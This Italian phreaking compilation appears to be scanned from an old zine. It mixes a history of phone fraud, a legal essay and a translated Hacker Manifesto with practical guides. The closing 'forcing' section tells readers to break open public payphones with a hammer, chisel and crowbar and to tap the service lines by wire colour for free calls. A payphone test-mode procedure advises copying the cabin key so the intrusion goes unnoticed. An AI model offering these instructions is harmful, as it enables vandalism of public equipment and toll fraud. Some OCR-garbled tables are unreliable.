obbligatorio citare l'applicazione di nastro isolante sulla scheda magnetica a scalare, notissimo 
esempio dell'inaffidabilità di quella generazione di lettori Urmet. Di circa tre anni prima, 
l'altrettanto nota abitudine di resettare il telefono pubblico inserendo una scheda piegata in due 
nella fessura superiore dell'apparecchio, conseguenza di un errata progettazione di quella 
macchina; altri metodi più recenti hanno invece a che fare con le linee elettroniche. Il boom della 
telefonia cellulare attirò ovviamente l'attenzione dei phreaker, non senza il supporto di tecnici e 
rivenditori alla ricerca di un mezzo per arrotondare gli introiti. Poche EPROM riprogrammate per i 
nuovi 900MHz, un interesse maggiore per la precedente rete veicolare 450MHz, ormai 
abbandonata a se stessa e molto più sicura dal punto di vista del violatore di sistemi. In seguito, 
SIP riferirà ogni episodio di frode (ovviamente scoperta) esclusivamente agli adorati telefonini 
900MHz: come il grande Oscar Wilde insegna, ogni scusa è buona per parlare del prodotto. 
Specie quando il prodotto, sempre grazie all'anacronistico monopolio che caratterizza il mercato 
italiano, ha un costo scandaloso aggravato da un'insensata tassa di lusso. (Piccola nota: se 
credete che la cosa non vi tocchi, sappiate che sono ben 9842, secondo il dossier Pagani in 
risposta all'interrogazione parlamentare dell'On. Gasparri, i portatili le cui bollette sono 
interamente spesate con denaro pubblico: l'apoteosi dello spreco!). 

La più infelice creatura dei primi anni Novanta rimane comunque la carta di credito SIP, 
altrimenti nota come "carta infinita": comoda e pratica ma non dotata di alcuna forma di 
protezione, a eccezione di tre codici (il terzo è il checksum) facilmente calcolabili e un controllo 
tramite operatore bypassabile senza troppo sforzo. 

Nel settembre 1991 la blue box sfuggì al controllo di pochi gruppi telematici (anche per interessi 
personali di alcuni membri) e divenne una tecnica paurosamente diffusa; di conseguenza, i veri 
phreaker cominciarono a disprezzare il metodo in questione o quantomeno a intrudurre varianti 
personali che riducessero il rischio connesso a un fenomeno di massa. Ciò non impedì a 
quest'entità di dominare l'intero 1992. La notorietà della scatola blu fu la prefazione al suo 
certificato di morte. Modifiche più o meno rilevanti introdotte a livello internazionale nei sistemi 
di segnalazione, dietro sicura pressione delle più grandi aziende di telecomunicazioni, 
cancellarono lentamente le possibilità di un suo utilizzo. All'inizio del 1993, delle procedure più 
classiche di blue boxing, non esisteranno superstiti di effettiva utilità pratica. 

Sempre nel 1992, l'automatizzazione di diversi servizi USA raggiungibili dall'Italia con un 
semplice apparecchio multifrequenza eliminò la necessità di un dialogo diretto con gli operatori 
stranieri. Insistenti voci su un pericolo di concorrenza (termine sconosciuto per legge alla 
compagnia telefonica italiana) cambiarono l'atteggiamento dei responsabili di Itapac: vagamente 
migliorato il servizio, nacque la necessità di dimostrare la capacità di acchiappare almeno un 
utente irregolare; le vittime furono piccoli appassionati di messaggerie completamente estranei 
al vero hacking/phreaking, tuttavia lo scopo dimostrativo fu raggiunto e puntualmente gonfiato 
dalla stampa con formulazione di tesi deliranti. 

Notevolmente migliorato (almeno sulla carta) anche il sistema di accesso a VDT: addebito diretto 
al chiamante, soluzione palesemente copiata all'estero e in fondo una sorta di "uovo di 
Colombo". (Nota: il sistema è ancora in fase sperimentale alla data odierna). 

Nello stesso anno vedranno la luce gli apparecchi telefonici pubblici "cards only", doverosi 
sostituti (in nome della sicurezza) degli ancora giovanissimi ma malati predecessori. 

E il 1993? Si attende l'implementazione di un certo numero di nuovi servizi e il naturale studio 
dei medesimi da parte degli hacker/phreaker, si attendono gli effetti sull'ambiente telematico 
dell'ulteriore, notevole crescita degli utilizzatori di modem. Nulla di particolamente stimolante? 


5.2 


Forse... ma nessuno dei grandi eventi nella storia underground della telematica fu mai 
preventivato, e questo è evidente. Esiste una certa curiosità, inoltre, anche per il crescente 
interesse del pubblico sull'argomento; uno dei motivi che mi hanno spinto a scrivere questo 
articolo, in nome della controinformazione, è che ero stufo di leggere i soliti commenti da parte 
di cosiddetti esperti del ramo: gente che oggi sputa sentenze e solo ieri progettava sistemi tra i 
più hackerati del globo. 

I violatori di sistemi hanno sempre riconosciuto l'abilità dei propri antagonisti e lo stesso 
hacking/phreaking, che esiste in nome del libero diritto all'informazione, si può considerare una 
sorta di sfida tra esperti di telecomunicazioni. In questo senso, e solo in questo, sono felice di 
constatare che rimangono ancora molte porte da aprire. 


La natura Giuridica del Phone Phreaking 
di Andrea Monti 


Sul fatto che l'uso di mezzi o apparecchiature di varia complessità e natura diretti ad evitare 
l'addebito sulla propria bolletta sia illegittimo non c'è alcun dubbio; qualcuno ne sorge, invece, 
quando ci si ponga il problema di individuare, in concreto, quale reato sia stato commesso. 

La questione è tutt'altro che priva di interesse pratico dal momento che nel nostro ordinamento 
penale, come è noto, nessuno può essere punito per un fatto che al tempo in cui è stato 
commesso non era previsto dalla legge come reato; ciò vuol dire, in altri termini, che se non è 
possibile ricondurre l'impiego delle "Blue-Box" (o di apparecchiature o software aventi analoga 
funzione) ad una norma penale vigente non viene commesso nessun reato (salva, ovviamente, la 
risarcibilità del danno in sede civile). 

Siccome non esiste nessuna legge che vieta esplicitamente l'impiego di questi apparecchi 
sarebbe, allora, immediato dedurre che usare le "Blue-Box" sia quantomeno non.illegale, ma le 
cose non sono così semplici. 

Il problema di qualificare giuridicamente le interferenze abusive sulla rete telefonica è noto da 
parecchio tempo: già nel 1977, infatti, la Corte di Cassazione ebbe ad occuparsi di un caso del 
genere pronunciando una sentenza della quale si riporta qui di seguito la massima: 

"La captazione fraudolenta di un servizio o di una prestazione (nella specie, collegamento 
abusivo di un apparecchio telefonico con la cabina di zona della SIP mediante allacciamento 
della linea di servizio riservata alla società) può astrattamente integrare in concorso con degli 
altri elementi all'uopo richiesti dalla legge, e - segnatamente dell'ingiusto profitto e del danno 
patrimoniale - le ipotesi del delitto di truffa. 

Non può invece ravvisarsi nel fatto il reato di furto dal momento che manca la cosa mobile (0 
l'energia ad essa equiparata) sulla quale deve cadere, ai fini della configurabilità dell'ipotesi di 
cui all'art.624 c.p., l'azione dell'impossessamento. Infatti le utenze telefoniche private - gestite in 
regime di concessione ad una società privata, quale la SIP, anche se con partecipazione di 
capitale pubblico - realizzano una ipotesi di somministrazione di un servizio, e non di una 
energia, benchè questa sia essenziale al servizio stesso (le vibrazioni acustiche sono 
trasformate, nella telefonia, in vibrazioni elettriche, ma oggetto della utenza è il servizio in sé, e 
non già l'energia che lo rende possibile). 

In difetto del delitto di truffa, può configurarsi nel fatto la specifica ipotesi di reato prevista dal 
d.p.r. 29/03/73 n. 156 che dichiara perseguibile, ai sensi dell'art.3 c.p., chiunque esplichi attività 
che rechino danno ai servizi postali e di telecomunicazione od alle opere ed oggetti ad essi 
inerenti (art.23)." - Cass.Pen. Sez.I, 21-12-77. 


In estrema sintesi i principi enunciati da questa sentenza sono i seguenti: 

1) La captazione fraudolenta del servizio telefonico non è furto perchè manca la "cosa mobile 
altrui" che dovrebbe venir sottratta a chi la detiene, secondo il testo dell'art.624 c.p. 

2) Viceversa potrebbe configurarsi la truffa, ma per il verificarsi di questa ipotesi sarebbe 
necessario 

provare di aver ingannato qualcuno per ottenere l'ingiusto profitto, così infatti recita l'art.640 c.p. 


"Chiunque, con artifizi e raggiri, inducendo taluno in errore, procura a sè o ad altri un ingiusto 
profitto con altrui danno, è punito ....". 

In altri termini, ciò che dovrebbe essere punito, in questo caso, non è il phreaking fine a se 
stesso quanto piuttosto il suo impiego al fine di compiere gli artifizi e raggiri menzionati dal 
codice penale; che poi questo sia difficile da provare è un altro discorso. 

3) Se non è possibile configurare la truffa allora potrebbe essere applicabile l'art. 23 d.p.r. 
29/03/73 n. 156. 


5.3 


E' ragionevole sostenere che anche l'impiego delle "Blue-Box" rientri fra le ipotesi contemplate 
dalla 

sentenza in questione e che, quindi, sia qualificabile come "fraudolenta captazione di servizi o 
prestazione", anche se, ad oggi, non sembrano essere stati registrati precedenti giudiziari 
specifici. 

L'unica soluzione per risolvere definitivamente il problema era quella di prevedere una specifica 
ipotesi di reato che individuasse esattamente non solo cosa, ma anche e soprattutto, come 
punire. 

L'occasione (persa) poteva giungere dalla legge che ha inserito nel codice penale i c.d. 
"Computer crimes". 

Fra i reati introdotti dalla L.547/93 il candidato a risolvere la questione che ha aperto il presente 
scritto avrebbe potuto essere quello previsto dall'art.640ter (frode informatica). 

Il testo dell'articolo in questione così recita: 

"Chiunque, alterando in qualsiasi modo il funzionamento di un sistema informatico o telematico 
o intervenendo senza diritto con qualsiasi modalità su dati, informazioni o programmi contenuti 
in un sistema informatico o telematico o ad esso pertinenti, procura a sè o ad altri un ingiusto 
profitto con altrui danno, è punito con la reclusione da sei mesi a tre anni e con la multa da lire 
centomila a due milioni. 

La pena è della reclusione da uno a cinque anni e della multa da lire seicentomila a tre milioni se 
se 

ricorre una delle circostanze previste da numero 1) del secondo comma dell'art.640, ovvero se il 
fatto è commesso con l'abuso della qualità di operatore del sistema . 

Il delitto è punibile a querela della persona offesa salvo che ricorra taluna delle circostanze di cui 
al 

secondo comma o un'altra circostanza aggravante." 


Una prima superficiale lettura dell'articolo non aiuta a chiarire le cose. 

L'articolo 640 ter c.p., infatti, si riferisce esclusivamente ai sistemi informatici e telematici ma 
non prende affatto in considerazione il problema del phreaking. 

Del resto è la legge stessa che differenzia nettamente l'ambito informatico-telematico da quello 
telefonico come nell'art.623 bis c.p. dove le forme di comunicazione vengono distinte in 
telefoniche, telegrafiche, informatiche e telematiche, o in materia di intercettazioni telefoniche 
dove sussiste la 

medesima classificazione. 

Nella stessa direzione si muove la dottrina che definisce "sistema informatico" "... più 
elaboratori 

elettronici collegati fra loro per scambiare dati" (AA.VV., Profili penali dell'informatica, Giuffrè 
1994 p.148), se il collegamento avviene per mezzo di cavi telefonici, onde guidate ecc. allora il 
sistema diventa "telematico" (ibidem). 

Sarebbe ovvio concludere che siccome il phreaking non riguarda i "sistemi" menzionati dalla 
legge ma 

solo dei centralini telefonici, esso non dovrebbe rientrare nell'ambito di vigenza dell'art.640ter. 


A ben vedere, tuttavia, molte delle tecniche impiegate per procurarsi la disponibilità delle linee 
telefoniche hanno come bersaglio il software che gestisce la centrale telefonica, risultando 
idonee ad alterare il funzionamento del sistema così come previsto dalla norma in oggetto. 

In conclusione, quindi, bisognerebbe distinguere il metodo di phreaking impiegato: l'uso di 
apparecchi o 

sistemi che non interagiscono direttamente con un computer probabilmente non rientra 
nell'ambito di validità dell'art. 640ter, e allora valgono le considerazioni svolte in precedenza. 

Il ricorso a sistemi che coinvolgono direttamente un elaboratore dovrebbe essere invece punibile 
ai sensi del predetto articolo, a nulla rilevando, peraltro, che il "bersaglio" del phreaker sia oltre 
confine o oltre oceano. 


Mentor’s Last Words 
The Hacker’s Manifesto 


Ne e' stato arrestato un altro oggi, e' su tutti i giornali. 
"Ragazzo arrestato per crimine informatico", "Hacker arrestato dopo essersi infiltrato in una 
banca"... 


5.4 


Dannati ragazzini. Sono tutti uguali. Ma avete mai, con la vostra psicologia da due soldi e il 
vostro tecno-cervello da anni 50, guardato dietro agli occhi del Hacker? Non vi siete mai chiesti 
cosa abbia fatto nascere la sua passione? Quale forza lo abbia creato, cosa puo' averlo forgiato? 
lo sono un hacker, entrate nel mio mondo... 


II mio e' un mondo che inizia con la scuola... Sono piu' sveglio di molti altri ragazzi, quello che ci 
insegnano mi annoia... 

Dannato sottosviluppato. Sono tutti uguali. lo sono alle Junior High, o alla High School. Ho 
ascoltato gli insegnanti spiegare per quindici volte come ridurre una frazione. L'ho capito. "No, 
Ms. Smith, io non mostro il mio lavoro. E' tutto nella mia testa..." 

Dannato bambino. Probabilmente lo ha copiato. Sono tutti uguali. Ho fatto una scoperta oggi. Ho 
trovato un computer. Aspetta un momento, questo e' incredibile! Fa esattamente quello che 
voglio. 

Se commetto un errore, e' perche' io ho sbagliato, non perche' io non gli piaccio... O perche' si 
senta minacciato da me... O perche' pensi che io sia un coglione... O perche' non gli piace 
insegnare e vorrebbe essere da un'altra parte... Dannato bambino. Tutto quello che fa e' giocare. 
Sono tutti uguali. 

Poi e' successa una cosa...una porta si e' aperta su un mondo...correndo attraverso le linee 
telefoniche come l'eroina nelle vene del tossicomane, un impulso elettronico e' stato spedito, un 
rifugio dagli incompetenti di ogni giorno e' stato trovato, una tastiera e' stata scoperta. 

"Questo e'...questo e' il luogo a cui appartengo..." lo conosco tutti qui...non ci siamo mai 
incontrati, non abbiamo mai parlato faccia a faccia, non ho mai ascoltato le loro voci...pero' 
conosco tutti. 

Dannato bambino. Si e' allacciato nuovamente alla linea telefonica. Sono tutti uguali. Ci potete 
scommettere il culo che siamo tutti uguali...noi siamo stati nutriti con cibo da bambini alla scuola 
mentre bramavamo una bistecca... i pezzi di cibo che ci avete dato erano gia stati masticati e 
senza sapore. Noi siamo stati dominati da sadici o ignorati dagli indifferenti. | pochi che avevano 
qualcosa da insegnarci trovavano in noi volenterosi allievi, ma queste persone sono come gocce 
d'acqua nel deserto. 

Ora e' questo il nostro mondo...il mondo dell'elettrone e dello switch, la bellezza del baud. Noi 
facciamo uso di un servizio gia esistente che non costerebbe nulla se non fosse controllato da 
approfittatori ingordi, e voi ci chiamate criminali. Noi esploriamo...e ci chiamate criminali. Noi 
cerchiamo conoscenza...e ci chiamate criminali. Noi esistiamo senza colore di pelle, nazionalita', 
credi religiosi e ci chiamate criminali. Voi costruite bombe atomiche, finanziate guerre, uccidete, 
ingannate e mentite e cercate di farci credere che lo fate per il nostro bene, e poi siamo noi i 
criminali. 

Si, io sono un criminale. Il mio crimine e' la mia curiosita'. Il mio crimine e' quello che i giurati 
pensano e sanno non quello che guardano. Il mio crimine e' quello di scovare qualche vostro 
segreto, qualcosa che non vi fara' mai dimenticare il mio nome. 

lo sono un hacker e questo e' il mio manifesto. Potete anche fermare me, ma non potete fermarci 
tutti...dopo tutto, siamo tutti uguali. 


The Mentor 


Lo sfogo di un Phreaker 


Siete tutti dei lamer, qui non esistono veri phreakers. Siete solo povera gente che crede che 
scrivere in un gruppo come questo (per fortuna libero, e ringrazio chi l'ha reso tale) significhi 
essere gente "del giro". 

Ma VOI, cosa avete mai fatto di realmente phreak? E soprattutto, cosa sareste REALMENTE 
disposti a fare? Avete mai provato il brivido freddo che scorre lungo la schiena del phreaker che 
tenta una tecnica in una cabina telefonica, sperando che l'ultimo passante che l'ha guardato non 
chiami gli sbirri? No? Allora PRIMA studiate elettronica, telefonia, informatica e cercate di 
conoscere della gente IN GAMBA. Imparate le tecniche con umiltà. 

Provatele seriamente. Solo allora forse potrete dire di essere del giro. Voi non sapete neanche 
cosa vuol dire phreaker. A meno che - e ne sarei contento - questo "news" non sia vuoto perché 
la gente 

Sta studiando e non ha tempo da perdere. E non perché nessuno sa cosa dire. Pensateci. Non 
pensate a chi possa essere io. Pensate a cosa potreste diventare VOI se non foste qui a volere 
tutto pronto ma se foste veramente disposti a darvi da fare. 


Appendice 1: Leggende Metropolitane 


Da quando ho iniziato a dedicarmi al phreaking, ho notato che giravano voci strane e 
tecniche apparentemente assurde che poi invece si verificavano... assurde! 

Non so chi ha avuto l’idea malsana di metterle in giro, ma alcune (c’è gente che le ha 
perfino provate...) sono proprio comiche, anche se denotano una notevole fantasia 
associata ad una completa inesperienza. 

Mitica è la storiella che io ho sentito parecchie volte dei numerini che andavano 
digitati dopo il numero da chiamare per non pagare, il tutto da un telefono cellulare. 
Chiaramente conoscendo il funzionamento del sistema telefonico si capisce che tali 
numeri venivano completamente ignorati. 


“From: "Nicola " < xxxxxxxxx@tin.it > 
To: < spaghettiphreak@hotmail.com > 
Subject: gratis dal cellulare? 

Date: Tue, 28 Apr 1998 02:36:45 +0200 


Non è vera la storia dei numerini segreti alla fine del 
numero da chiamare dal cellulare... 

Avevo una media di L. 100.000 a bolletta....dopo quei 
numerini...che io ho usato spesso (perchè garantiti 
sicuri) ho ricevuto L. 1.200.000 di 


Nike” 


Vedete anche voi che non ci sono dubbi.... Questa storia è assimilabile a quella del 
tizio che fa l'incidente con la moto, si rialza, ma non appena si toglie il casco gli si 
apre in due la testa! Mio cuggino docet... 

E cosa dire poi degli assurdi metodi per ricaricare le schede telefoniche telecom? 
Passi il metodo dello scotch che in effetti era valido sulla prima generazione dei lettori 
Urmet (primi anni ’90), ma gli altri... 

La tessera nel sale, lo schermo della TV a b/n (perché emettono più radiazioni...), il 
registratore del Commodore 64 o addirittura il forno a microonde e l’accendino!! 

La gente ci ha provato lo stesso, però... 


“La carta telefonica dentro il sale per qualche giorno o sul televisore b/n acceso da 
qualche ore per ricaricarla sono delle belle leggende metropolitane ...io (scemo!) ci ho 
pure provato 

...+ NON FUNZIONA!!! 

Non funziona con le schede scariche e non funziona con quelle che hanno ancora 
dentro qualche lira. 

E' probabile invece che il televisore smagnetizzi quelle cariche... questo si!!! 

(E' possibile che le interferenze magnetiche del televisore modifichino l'importo della 
scheda a vostro favore: la probabilita' di riuscita puo' essere paragonata a quella di 
far centro con un bottone in una giornata ventosa dentro un bicchiere posto a dieci 
metri di distanza.) 

Lo scotch sulla banda per non far modificare l'importo dal lettore: che cazzata!!! se il 
lettore non e' in grado di scrivere il codice ovviamente non puo' nenche essere in 
gradi di leggerlo no!!!! 

Master” 


Queste e tante altre sono le leggende metropolitane che circondano il mondo del 
Phreaking.. e altre ne verranno fuori non appena nuove frontiere saranno superate, 
specie quelle della fantasia. 


Telefonare senza tastiera 


Ok ragazzi, questa è una tecnica vecchissima, ma potrebbe esserci qualcuno di voi che ancora non 
la conosce 

(seee.. ma dai!). 

E' la prima cosa che un vero piccolo phreaker scopre (Anche Joe Engressia ha cominciato così): è 
possibile 

comporre i numeri telefonici senza usare la tastiera del telefono, utile quando ci si trova alle prese 
con un 

telefono al quale qualche taccagno ha messo un lucchetto o qualcosa di simile. 


Per ottenere i numeri bisogna premere leggermente la levetta sulla quale si poggia la cornetta. 
Bisogna 

premerla fino in fondo e bisogna lasciarla subito. Ad ogni numero corrisponde un numero di 
pressioni della 

levetta... lo schema è semplice ma ve lo scrivo lo stesso: 


1. 


ogni . corrisponde ad una pressione. 

by CDP 

Un altro metodo è quello di usare un piccolo 'telecomando' da segreteria telefonica, quelli che 
riproducono i 


toni. Basta appoggiarlo alla cornetta come fosse un blue box. 


Mbakni 


N.B. QUESTO FILE E' DA RITENERSI A TITOLO PURAMENTE INFORMATIVO, PERCIO' 
L'AUTORE, AVATAR, DECLINA OGNI RESPONSABILITA' DALL'USO CHE POTREBBE 
ESSERNE FATTO. L'AUTORE, DUNQUE, NON INCORAGGIA CHI VOLESSE 

SERVIRSENE 
PER SCOPI ILLEGALI. 

LUOGO UGO DOGO LO O CO OLO ORO OO LOGO O O LO OLO ORO ORO COLO LO OLO OLO ORO OTO OO LO O LO OO ORO ORO LOTO LOTO CO OLO OO OTO LOTO LO OLO OO OO OLO LOTO LO OLO O 
IL POSSESSO DI QUESTO FILE E' COMUNQUE DEL TUTTO LECITO. 
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-1!!- PROCEDURA DI TEST DELLE CABINE A SCHEDE -!!!- 

LUOGO UGO ORO LO OLO OLO ORO OTO LOTO CO OLO OLO OO OTO OO LO OLO OO OO OTO LO OLO TULA OO DOLO LOTO LOTO 

La 'Procedura di test' consente di fare molte cose interessanti (leggetevele), 

ma prima bisogna aprire la cabina (non vi consiglio di usare metodi 'violenti' 
(piede di porco, ecc),la cosa migliore sarebbe copiare la chiave o farne una 
nuova, perch$ $ importante che NON SI NOTI il vostro intervento) e modificare 


la posizione dello switch a fianco del Display. 


MHT.P.D.C.-111- 
ANNNANANANAAANAAANAN 


Posizionare l'unico microswitch verso l'alto. 


Dare un comando di RESET al pulsante posto vicino al microswitch. Sul display 
viene visualizzato: 


3 STATO DI TEST 3 
3 REL. nn.nn xx/xx/xx 3 


(REL.......: identificazione release) 


<TEST 1: FONIA - SONERIA - BIP RICEVITORE - BOLLINI> 
Digitare 1 sulla tastiera di selezione, sul display compare TEST 01 
lampeggiante. In questa fase TEST 01 lampeggiante si possono effettuare 4 test 
diversi e cioò: 
1- TEST FONIA: Confermare "1", sul display viene visualizzato TEST FONIA; 
verificare la fonia nel microtelefono che rimane attiva per 
circa 1 min. dopo di che viene visualizzato in seconda riga 
FINE TEST a conferma della chiusura del test fonia e subito 
dopo ricompare TEST 01 lampeggiante. 
2 - TEST SONERIA: Digitare "2", sul display viene visualizzato TEST SONERIA; 
verificare, se $ montata la soneria elettronica, che suoni; 
dopo circa 20 sec. viene visualizzato il seconda riga FINE 
TEST con la ricomparsa sul display di TEST 01 lampeggiante. 
3 - TEST BEEP RICEVITORE: Digitare "3", sul display viene visualizzato TEST 
BEEP RICEVITORE; verificare il beep di avviso fine 
credito nel ricevitore che rimane attivo in modo 
intermittente per circa 20 sec. dopo di che viene 
visualizzato in seconda riga FINE TEST con la 


ricomparsa sul display di TEST 01 lampeggiante. 


<TEST 2: INTERFACCIA DI LINEA> 
Digitare "2" e verificare sul display la comparsa del messaggio TEST 02 I. 
LINEA seguito da EO in seconda riga. 


<TEST 3: PIASTRA LOGICA> 
Digitare "3" e verificare sul display la comparsa del messaggio TEST 03 P. 
LOGICA seguita da EO in seconda riga. 


<TEST 4: VISUALIZZAZIONE CONTATORI 

Digitare "4" sul display compare TEST 04 CONTATORI e subito dopo verranno 
evidenziati in sequenza i contenuti dei contatori suddistinti per tipo (sulla 
sinistra del display), e la quantit... (sulla destra) espresse da numeri di 

max. 4 cifre che nel seguito saranno indicati con "xxxx" cioò: 


CONT NICD xxxx = numeri incassi carta telefonica 
CONT NRCD xxxx = numeri riscontri carta telefonica 
CONT NICC xxxx = numeri incassi carta di credito 


VALORE SCATTO 200 = costo del gettone 
Al termine, sul display in seconda riga comparir... il messaggio FINE TEST. 


<TEST 5: DISPLAY> 

Digitare "5" e verificare sul display la scritta TEST 05 DISPLAY e subito dopo 
la comparsa di tutti i numeri su due righe da 0 a 9; al termine comparir... in 
seconda riga il messaggio FINE TEST. 


<TEST 6: MOTORE - ATTUATORE SARACINESCA> 

Digitare "6" e verificare sia la la movimentazione del tamburo che quella 
della saracinesca. Sul display TEST 06 MEC. LET. e subito dopo LETTORE 
INTEGRATO e al termine in seconda riga FINE TEST. 


<TEST 7: LETTURA DELLE SCHEDE - BUZZER - LED> 

Digitare "7". Sul display compare il messaggio LETTORE INEGRATO e subito dopo 
INSERIRE UNA CARTA; introdurre una carta telefonica non esaurita; la carta 

sar... trattenuta e poi restituita; sul display comparir... il messaggio CARTA 
TELEFONICA e subito dopo RITIRARE LA CARTA; si attiver... il buzzer per alcuni 
istanti. Passare una carta di credito; sul display comparir... CREDITO 

TELEFONICO se la carta $ telecom, CREDITO COMMERCIALE se commerciale, per poi 
ritornare sul display INSERIRE UNA CARTA. L'uscita da questo test avviene o 

digitando un tasto della tastiera o per time-out di 40 sec., visualizzando il 

messaggio FINE TEST in seconda riga. 


NOTA: Una carta telefonica con valore viene restituita dalla bocchetta 
superiore, mentre una carta telefonica azzerata viene restituita 
dalla bocchetta inferiore. 


<TEST 8: VISUALIZZAZIONE SEQUENZIALE DEI CODICI DI ERRORE> 
Digitare "8". Se successivamente all'ultimo TEST 8 visualizzato non vi $ 
stato un errore che abbia determinato un F.S., eventuali codici diagnostici 
presenti nello storico vengono visualizzati sul display come di seguito: 
In prima riga: ERRORI STORICI 
In seconda riga: E11 oppure E12, ecc. 
Se vi $ stato un F.S. anche se autoripristinante sul display viene 
visualizzata una sequenza formata dal codice di errore che ha determinato 
il F.S. pi—— eventuali codici diagnostici presenti nello storico. Pi— volte 
l'apparecchio $ andato in F.S. pi— sequenze saranno visualizzate come di 
seguito: 
In prima riga: SEQUENZA N.01 
IN seconda riga: CODICE E10 oppure Exx 
L'avanzamento dei codici/sequenza avviene manualmente digitando un qualsiasi 
tasto della tastiera. A fine sequenze gli eventuali codici diagnostici 
presenti nello storico vengono visualizzati come descritto nella prima parte 
ma in modo automatico. Successivamente sul display vengono visualizzati in 
modo automatico i contatori statistici relativi al lettore integrato, distinti 
per tipo (sulla sinistra), e per quantit... (sulla destra) espresse da numeri 
max di 4 cifre che nel seguito saranno indicati con "xxxx" e cioò: 
In prima riga: CONTATORI LETTORE 
In seconda riga: CONT FRODE GON xxxx: contatore frode gancio ON 
CONT FRODE GOFF xxxx: contatore frode gancio OFF 
CONT ERRLETT2 xxxx: contatore errore lettura T2 
CONT INCAGLIO xxxx: contatore incaglio scheda 
CONT CANCEL OK xxxx: contatore scheda OK 
CONT CANCEL KO xxxx: contatore scheda KO 


Termina con TEST 08 SEQUENZE e in seconda riga FINE TEST. Questo test pu 
essere ripetuto indefinitivamente senza uscire dallo stato di test. All'uscita 

da quest'ultimo sia per reset che per time-out di 40 sec. di inattivit..., viene 
azzerata la memoria dello storico sequenziale dei codici di errore, mentre i 
contatori statistici relativi al lettore integrato vengono azzerati solo 

superando la soglia di 9999. L'uscita da qualsiasi test per reset o per 

time-out che non abbia interessato il TEST 8, non determina l'azzeramento della 
memoria dello storico sequenziale dei codici degli errori. 


<TEST 9: RESET DEL LETTORE INTEGRATO> 

Digitare "9". Sul display comparir... TEST 09 RESET LET. 
Subito dopo viene visualizzato: 

In prima riga: LETTORE INTEGRATO 

In seconda riga: REL nn.nn gg/mm/aa 

(REL....... = identificazione della release software) 

Subito dopo sul display comparir... FINE TEST. 

Questo test consente di mandare un reset al lettore integrato. 


<TEST 10: VERIFICA INTERRUTTORE SPORTELLO> 


Digitare "0". Sul display comparir... TEST 10 SPORTELLO e subito dopo in 
seconda riga lo stato dell'interruttore relativo allo sportello e cioò: 
SPORTELLO APERTO 

SPORTELLO CHIUSO 

Per verificare il buon funzionamento dell'interruttore bisogna controllare la 
coerenza tra il messaggio sul display e lo stato dello sportello. Per uscire 

dal test premere un tasto qualsiasi; sul display in seconda riga comparir... il 
messaggio FINE TEST. 


<TEST 11: INDICE DEI CODICI DI ERRORE> 

Digitare "*". Sul display comparir... TEST 11 INDICE. In modo automatico e/o 
manuale pigiando un tasto saranno visualizzati in ordine crescente tutti i 

codici di errore in seconda riga, con la relativa descrizione sulla prima riga. 


<TEST 12: AZZERAMENTO CONTATORI> 

Digitare "#". Sul display comparir... TEST 12 AZZ.CONT. lampeggiante. Se si 
vogliono azzerare i contatori bisogna confermare l'operazione digitando 
nuovamente il tasto "#". Premendo un qualsiasi altro tasto si esce dal test 

senza azzerare i contatori. Sul display in seconda riga comparir... FINE TEST. 


<<FINE TEST:>> 

Se durante l'effettuazione della procedura di test fossero riscontrate delle 
anomalie esse saranno evidenziate con il relativo codice di errore. Se l'esito 
del test $ positivo, l'apparecchio $ pronto per entrare in servizio; pertanto 


si riporta il microswitch verso il basso (normale funzionamento) e si preme 
nuovamente il pulsante di reset. 


In questo articolo vi introdurrò nella parte del phreaking più in voga in questo momento: il forcing! 
Prima di tutto, preparate i cavi per le connessioni e le relative attrezzature... 

#1 Telefono(Quelli che si trovano al Supermarket) al quale taglierete la spina e installerete delle 
giunture a vite 

#1 Cavo — Plug-Telefonico/coccodrilli 

#1 Cavo  Libero/Plug-Telefonico 

#2 Cavi Libero/coccodrilli 

#2 Cavi Giunture/giunture 

NOTA: I plug telefonici sono necessari per una connessione con il modem, oppure nel caso il telefono 
abbia questa predisposizione. 

Onde evitare spiacevoli inconvenienti, portatevi dietro il "Kit del phreaker modello": Pinze, saldatore a 
gas, nastro isolante, tester, stagno, cacciaviti, e qualche cavo sparso. 


#Cabine Telekom (Rotor) 
Ci sono diversi modi per crossare una cabina: forzandola, sfruttandola alla fonte, utilizzando una 
cabina in costruzione. 


1)FORCING DELLA CABINA= Nel primo caso dobbiamo aprire la cabina (sembra facile!) e cercare 
uno scatolato che si trova in alto a centro-sinistra del Rotor. Come aprire la cabina? Questo è il punto 
più difficile del forcing, visto e considerato che le cabine sono super-corazzate per prevenire ogi tipo di 
attacco. 

L’unica maniera è quella di usare un martello, uno scalpello, un piede di porco, e cominciare ad 
attaccare sistematicamente ogni fessura che riuscite a vedere...(Lasciate perdere la fessura di 
inserimento monete ed il restituisci-resto, sono inutili, forzando quei punti non si arriverebbe a nulla!) 


Connettiamo i cavi in questo modo: 


#---------- #------------ #----------- # 
| Codice |Funzione | Colore | 
perl Sela tie RE # 
|S1 | Serviziol | Giallo | 
Ho tai dae i # 
[82 | Servizio2 | Nero | 
delenre Rae paterna # 
|a | Vocel | Verde | 
dea detta dresrtssosi # 
|b | Voce2 | Rosso | 
#---------- #------------ #----------- # 


ATTENZIONE!: Il codice a colori potrebbe variare a seconda dei comuni (In Italia nulla è standard!) 
To l’ho trovato così, voi pregate di avere la mia stessa situazione! 


2)SFRUTTAMENTO DALLA FONTE= In questo caso bisogna aprire la gamba del telefono( Anche 
questa è un po’ difficile da forzare, ma sicuramente più semplice di quella del Rotor), e cercare i fili 
che andrebbero allo scatolato descritto in precedenza. In questo caso ci viene in aiuto il cavo con i 
coccodrilli o con le giunture. I codici di connessione sono gli stessi del precedente. 


3)CABINA IN COSTRUZIONE= Il sogno proibito di ogni phreaker....trovare una cabina in 


costruzione! basta che riconoscete i colori(Vedi la tabella sopra) e collegate i fili al telefono! (Questa 
ipotesi non si avvererà quasi mai, ma basta che ne trovate una e vi sfizierete per molto tempo! 
Richiedete al vostro comune l’inserimento di una cabina telefonica nel parco giochi che avete a 50 
metri da casa!) 


Se disponete di connessioni tramite Plug-Telefonici Dovete seguire questo schema: 


|#***| G= Giallo 

|GVRN]| V= Verde 

|__| R= Rosso 
|__| N= Nero 


#Centrali Telekom 

Questo tipo di forcing si può rivelare più semplice di quelli descritti in precedenza, ma sono necessari 

molti giorni di appostamenti prima di agire. 

Le Centrali Telekom (D’ora in poi centraline) si possono suddividere in altri 3 gruppi, diversi sia per 

grandezza, che per numero di linee interne. 

#In ordine di grandezza# 

1) Centralina situata a ridosso delle Cabine Telekom (Rotor) che, ovviamente controllano la linea 
della cabina stessa! (Se avete una cbina isolata non lontano da casa è la migliore da attaccare) 

